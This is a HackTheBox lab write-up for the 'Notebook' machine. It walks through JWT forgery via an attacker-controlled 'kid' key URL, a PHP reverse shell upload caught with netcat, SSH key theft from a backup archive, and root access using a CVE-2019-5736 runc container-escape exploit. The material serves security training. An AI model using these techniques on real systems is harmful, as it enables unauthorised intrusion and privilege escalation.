![20257d912c57cbaa82b95e8658a481a6.png](ad9d537d4ad94b0f8c04ed9296067058.png) # Port Scanning and General Enumeration (Nmap, FFuF) ### Nmap Scans All ports ``` nmap -p- -oN nmap/allports -T4 Nmap scan report for Host is up (0.053s latency). Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 10010/tcp filtered rxapi ``` Standard aside from `10010`, what's that? Targeting the open ports ``` nmap -p22,80,10010 -oN nmap/targeted -T4 -sC -sV Nmap scan report for Host is up (0.060s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA) | 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA) |_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: The Notebook - Your Note Keeper 10010/tcp filtered rxapi Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Sever on port 80 is running **nginx/1.14.0**, let's browse it and see what we're up against ![186ed1d7c9352924549e3fbd2bcad904.png](fb27250e6cf9440a83d32da46ca8ce52.png) After registering an account and checking out the requests in **BurpSuite** we can see that it sets two cookies: ``` uuid auth ``` And the `auth` cookie is a **JWT** with a "kid" *(Key ID)* header that points to a port on the localhost that we can't access ![9594f63cb7f4c8f2d8ae698b40168a75.png](e67d80b6e3464731ade6411a6492bdb2.png) Running a quick **FFuF** using the [common wordlist from Seclists](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt) matching all and filtering 404s doesn't reveal much. There's an `/admin` endpoint but that's about it ``` admin [Status: 403, Size: 9, Words: 1, Lines: 1] login [Status: 200, Size: 1250, Words: 173, Lines: 31] logout [Status: 302, Size: 209, Words: 22, Lines: 4] register [Status: 200, Size: 1422, Words: 193, Lines: 33] ``` --- # Access (JWT, PHP Reverse Shell) Really the only interesting thing we have is this **JWT** *(JSON Web Token)*. There's a **BurpSuite** addon for dealing with these called, well.. **JSON Web Tokens** ![2db2550bbc88792522b94fded2be0781.png](f9fccd49d8a94debaf9b63907949ac5a.png) > BurpSuite addons can be found under **Extender** --> **BApp Store** Now that we're set up to handle these tokens, we can capture the request in **BurpSuite**, send it to the **Repeater** tab and start taking a look and messing with the values of this **JWT**. ![1bc38beeb6d7cc9de3b087dde469ea05.png](7ec6280538134952a5b76d117320d4c6.png) So we can see that it's a **JWT** that's been signed with the **RS256** algorithm and it has the optional **kid** *(Key ID)* field. The **kid** is basically saying 'Hey, this is the key that's being used to verify this signature.' Which in the case of the **RS256** algorithm, it's pointing to the *public* key used to verify the signature. There's a lot to talk about when it comes to the different algorithms used for encryption, but the important thing to know is that **RSA256** is asymmetric and requires a **private** key to sign the token and a **public** key to verify it. Let's start testing this **kid** value. What happens if we point it to a server that we control? ![14a3881b5814d41a60017de67825d513.png](b3a9799c55f644e6988da08c487c9428.png) That's *not* good for the server, but *great* for us. That means we can create a brand new key pair to sign and verify tokens and the server will treat them as valid! Let's do that. First, let's generate a new key pair ``` openssl genrsa -out mykey.pem 4096 openssl rsa -in mykey.pem -pubout -out pubkey.pem ``` Next, let's forge a new token using [jwt.io]() 1. Change the 'admin_cap' field from 0 to 1 2. Point the 'kid' field to your **public** key on your server 3. Copy the contents of your **private** key into the box that's labeld **Private Key** ![f166c5d7edd43b25d8c337e32db2103b.png](dd6e6425b9a346b69dc93fa074ec7dad.png) Now let's send it off, this time, point the request at the `/admin` endpoint. If you get a **200** response, then you did it correct and you can take your new **JWT** and plunk it into the cookie **auth** field of your browser. So now we have access to the **Admin Panel** ![56a77712bc734230dc6c868a3a6464cc.png](cbd05317dd3e42089534b8970a6647c9.png) ![3a1735766c44b7b77f223de165eb09a0.png](155a6accd1364e00a48534c17451fd87.png) ## Interesting Notes **Need to fix config** ``` Have to fix this issue where PHP files are being executed :/. This can be a potential security issue for the server. ``` **Backups are scheduled** ``` Finally! Regular backups are necessary. Thank god it's all easy on server. ``` Backups? Let's keep an eye out for any potential backup files ## Upload Surprisingly, I tried uploading the `php-reverse-shell` from pentestmonkey and it worked first time. No fuzzing required! Running a listener with `nc -lvnp 4444` and clicking 'view' gets us a hit ![7ab2d583c0855fae2d5e66be87f5b845.png](c42d32c55ccf4901b796dc9ba01e9baa.png) ![77a254d0e3fa618a8b66a6a0d7ee8d36.png](66031715e501414f8eb670f6f4f42ce6.png) --- # Privesc (Docker, CVE-2019-5736) We're only `www-data` so let's stabilize the shell a bit ``` python3 -c 'import pty; pty.spawn("/bin/bash")' Ctrl+Z stty raw -echo && fg enter, enter export TERM=xterm ``` Now we can do some enumeration with a decent enough shell. Just taking a look around the file system I bumped into a **backups** directory located at `/var/backups`. Inside is `home.tar.gz`. Copy it to the `/tmp` directory and unzip it. with `tar -xzf` Unzipping it reveals: ![acd0fd90ddec9afd87820b21494853fd.png](b433e971710d4c71836b348485b01f75.png) Noah's home directory! Transfer his **SSH key** *(id_rsa)* over to your box, give it the right permissions *(chmod 600 id_rsa)* and use it to ssh in! ![ef9c44c7dbb042e02c222b8ed82e96a8.png](b65029bdfe00470abc19bd194be74aa3.png) Now that we're **Noah**, let's see what we can do ``` sudo -l Matching Defaults entries for noah on thenotebook: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User noah may run the following commands on thenotebook: (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01* ``` So we can execute a **Docker Container** called **webapp-dev01** in **interactive** mode *(-it)* with one argument following it *(\*)* as root. Neat! Doing research I stumbled upon [CVE-2019-5736](https://github.com/Frichetten/CVE-2019-5736-PoC) a really neat exploit that will grant privileged command execution on the host from within the container. Grab the `main.go` file off **github** and edit the payload to whatever you want to do. You could get a shell, copy the contents of the shadow file and crack the password. Up to you! I just had it cat the contents of the flag ``` // This is the line of shell commands that will execute on the host var payload = "#!/bin/bash \n cat /root/root.txt > /home/noah/root.txt" ``` compile the program with `go build main.go` Now that the exploit is ready, let's prep the machine. First, start up the container ``` sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash ``` ![5ede42c9fcf03da601784c6429375303.png](6922b8261a7148edb077951a7428b0f6.png) Next, ssh back in as **Noah** in another tab/split/pane and type **(but don't send)** ``` sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh ``` ![f93c6ca0fb06edd3cd008c6152b6f6c2.png](fa49dc10fc1346e28b4a5de4c8176654.png) Now, if you're expecting a shell, fire up a listener in another tab/split/pane `nc -lvnp 4444`, otherwise transfer the `main` binary from your machine to the docker container using `wget` and `python3 -m http.server` ![7a7348e3d1ed184f352ecffc958ed454.png](cb2de4276e1549a495a92faed5cb72bb.png) Make it executable `chmod +x main` and run it `./main`. Once you see this ![c23523c9c2fbd3e5e6ce5f9039f4c2b4.png](509211e87903405e894f152bc81409a1.png) Run the command in your other pane/tab/window. You should see this in the container pane ![a3646ca5e27233b97a206861d94e2c48.png](4cc045e10d5f49cc87a863019cfd68ff.png) And if you followed my directions, you'll see the root flag sitting in **Noah's** home directory ![2a80b51d15aa7a028a825c0df608a8d4.png](465accdb4dff4df28f7e3ac54f13ddc0.png) --- Back to [[HackTheBox Index]] Tags: #htb #hackthebox #box_writeups #jwt #json_web_tokens #docker #cve-2019-5736 #enumeration Related: